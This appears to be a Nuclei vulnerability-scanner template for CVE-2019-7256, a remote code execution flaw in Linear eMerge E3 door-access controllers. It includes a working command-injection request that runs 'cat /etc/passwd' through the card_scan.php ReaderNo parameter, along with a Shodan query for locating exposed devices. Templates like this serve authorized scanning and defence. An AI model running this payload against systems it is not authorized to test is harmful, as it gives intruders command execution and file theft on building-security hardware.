id: CVE-2019-7256 info: name: eMerge E3 1.00-06 - Remote Code Execution author: pikpikcu severity: critical description: | Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities. reference: - https://www.exploit-db.com/exploits/47619 - http://linear-solutions.com/nsc_family/e3-series/ - https://nvd.nist.gov/vuln/detail/CVE-2019-7256 - https://applied-risk.com/labs/advisories classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2019-7256 cwe-id: CWE-78 epss-score: 0.97447 metadata: max-request: 2 verified: true shodan-query: title:"eMerge" tags: cve,cve2019,emerge,rce,edb variables: file: "{{rand_text_alpha(10)}}" http: - raw: - | GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1 Host: {{Hostname}} - | GET /{{file}}.txt HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200